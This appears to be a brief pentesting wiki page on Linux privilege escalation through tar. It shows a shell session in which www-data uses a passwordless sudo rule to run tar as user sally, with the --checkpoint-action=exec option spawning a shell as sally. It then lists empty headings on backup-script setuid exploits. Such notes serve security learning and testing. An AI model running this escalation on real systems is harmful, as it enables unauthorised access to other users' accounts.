TAR backups
Easy PrivEsc
> whoami
www-data
> sudo -l
(sally) NOPASSWD: /bin/tar
> sudo -u sally tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
> sudo -u sally tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
> whoami
sallyBackup Script Vulnerability
Just like NFS Root Squashing
Backup Script Discovery
Backup Flaw Scenario
Backup Flaw Exploit #1
Create the evil setuid
TAR the evil suid
Backup Flaw Exploit #2
REF
Last updated